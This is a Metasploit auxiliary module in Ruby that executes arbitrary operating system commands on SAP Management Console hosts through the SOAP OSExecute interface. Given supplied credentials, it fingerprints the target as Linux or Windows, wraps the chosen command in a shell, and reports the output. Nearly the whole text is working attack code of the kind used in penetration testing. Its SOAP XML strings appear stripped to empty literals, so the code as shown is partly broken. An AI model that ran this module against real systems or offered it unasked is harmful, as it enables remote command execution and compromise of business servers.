## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'SAP Management Console OSExecute', 'Description' => %q{ This module allows execution of operating system commands through the SAP Management Console SOAP Interface. A valid username and password must be provided. }, 'References' => [ # General [ 'URL', 'http://blog.c22.cc' ] ], 'Author' => [ 'Chris John Riley' ], 'License' => MSF_LICENSE ) register_options( [ Opt::RPORT(50013), OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']), OptString.new('USERNAME', [true, 'Username to use', '']), OptString.new('PASSWORD', [true, 'Password to use', '']), OptString.new('CMD', [true, 'Command to run', 'set']), ], self.class) register_autofilter_ports([ 50013 ]) end def run_host(ip) # Check version information to confirm Win/Lin soapenv='http://schemas.xmlsoap.org/soap/envelope/' xsi='http://www.w3.org/2001/XMLSchema-instance' xs='http://www.w3.org/2001/XMLSchema' sapsess='http://www.sap.com/webas/630/soap/features/session/' ns1='ns1:GetVersionInfo' # Using GetVersionInfo to enumerate target type data = '' + "\r\n" data << '' + "\r\n" data << '' + "\r\n" data << '' + "\r\n" data << 'true' + "\r\n" data << '' + "\r\n" data << '' + "\r\n" data << '' + "\r\n" data << '<'+ ns1 + ' xmlns:ns1="urn:SAPControl">' + "\r\n" data << '' + "\r\n" data << '' + "\r\n\r\n" print_status("[SAP] Attempting to enumerate remote host type") begin res = send_request_raw({ 'uri' => normalize_uri(datastore['URI']), 'method' => 'POST', 'data' => data, 'headers' => { 'Content-Length' => data.length, 'SOAPAction' => '""', 'Content-Type' => 'text/xml; charset=UTF-8', } }, 60) rescue ::Rex::ConnectionError print_error("#{rhost}:#{rport} [SAP] Unable to communicate") return :abort end if not res print_error("#{rhost}:#{rport} [SAP] Unable to connect") return elsif res.code == 200 body = res.body if body.match(/linux/i) print_status("[SAP] Linux target detected") cmd_to_run = '/bin/sh -c ' + datastore['CMD'] elsif body.match(/NT/) print_status("[SAP] Windows target detected") cmd_to_run = 'cmd /c ' + datastore['CMD'] else print_status("[SAP] Unknown target detected, defaulting to *nix syntax") cmd_to_run = '/bin/sh -c ' + datastore['CMD'] end end osexecute(ip, cmd_to_run) end def osexecute(rhost, cmd_to_run) print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}") success = false soapenv = 'http://schemas.xmlsoap.org/soap/envelope/' xsi = 'http://www.w3.org/2001/XMLSchema-instance' xs = 'http://www.w3.org/2001/XMLSchema' sapsess = 'http://www.sap.com/webas/630/soap/features/session/' ns1 = 'ns1:OSExecute' data = '' + "\r\n" data << '' + "\r\n" data << '' + "\r\n" data << '' + "\r\n" data << 'true' + "\r\n" data << '' + "\r\n" data << '' + "\r\n" data << '' + "\r\n" data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl">' + cmd_to_run data << '0' + "\r\n" data << '' + "\r\n" data << '' + "\r\n\r\n" user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD']) begin res = send_request_raw({ 'uri' => normalize_uri(datastore['URI']), 'method' => 'POST', 'data' => data, 'headers' => { 'Content-Length' => data.length, 'SOAPAction' => '""', 'Authorization' => 'Basic ' + user_pass, 'Content-Type' => 'text/xml; charset=UTF-8', } }, 60) if res and res.code == 200 success = true body = CGI::unescapeHTML(res.body) if body.match(/(.*)<\/exitcode>/i) exitcode = $1.to_i end if body.match(/(.*)<\/pid>/i) pid = $1.strip end if body.match(/(.*)<\/lines>/i) items = body.scan(/(.*?)<\/item>/i) end elsif res and res.code == 500 case res.body when /(.*)<\/faultstring>/i faultcode = "#{$1}" fault = true end else print_error("#{rhost}:#{rport} [SAP] Unknown response received") return end rescue ::Rex::ConnectionError print_error("#{rhost}:#{rport} [SAP] Unable to attempt authentication") return :abort end if success if exitcode > 0 print_error("#{rhost}:#{rport} [SAP] Command exitcode: #{exitcode}") else print_good("#{rhost}:#{rport} [SAP] Command exitcode: #{exitcode}") end saptbl = Msf::Ui::Console::Table.new( Msf::Ui::Console::Table::Style::Default, 'Header' => '[SAP] OSExecute', 'Prefix' => "\n", 'Columns' => [ 'Command output' ] ) items.each do |output| saptbl << [ output[0] ] end print_good("#{rhost}:#{rport} [SAP] Command (#{cmd_to_run}) ran as PID: #{pid}\n#{saptbl.to_s}") elsif fault print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}") return else print_error("#{rhost}:#{rport} [SAP] failed to run command") return end end end